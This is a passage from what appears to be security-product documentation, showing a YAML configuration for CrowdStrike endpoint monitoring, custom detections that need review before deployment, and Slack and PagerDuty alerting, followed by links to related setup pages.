  platform: crowdstrike
  monitoring:
    - process_execution
    - file_modifications
    - network_connections
    - registry_changes
  custom_detections:
    enabled: true
    auto_deploy: false  # Require FDSE review before deployment
  alerting:
    severity_threshold: medium
    channels:
      - slack: "#security-alerts"
      - pagerduty: security-oncall
```
Next Steps
- Cloud Security - Detect risky changes across cloud and SaaS
- Identity + OAuth - Monitor identity threats
- Integrations - Connect your EDR platform